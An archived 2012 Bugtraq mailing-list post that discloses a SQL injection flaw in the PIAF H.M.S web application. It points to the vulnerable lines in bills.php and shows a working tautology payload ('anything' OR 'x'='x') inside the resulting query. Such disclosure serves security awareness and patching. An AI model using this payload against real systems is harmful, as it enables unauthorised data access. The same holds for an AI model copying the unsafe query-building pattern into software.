| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAHKpqwbdsw94U2LX4a3FH64jT9iTU3n+C3E_d_W=gaTVmckOzA@mail.gmail.com>
Date: Sun, 28 Oct 2012 13:29:31 +0100
From: Michał Błaszczak <blaszczakm@...il.com>
To: bugtraq@...urityfocus.com
Subject: PIAF H.M.S - SQL Injection
# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/
file: bills.php
line: 86-87
$query = $query . " ORDER BY ID DESC";
printf($query);
query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC
Michał Błaszczak
blaszczakm.blogspot.com
Powered by blists - more mailing lists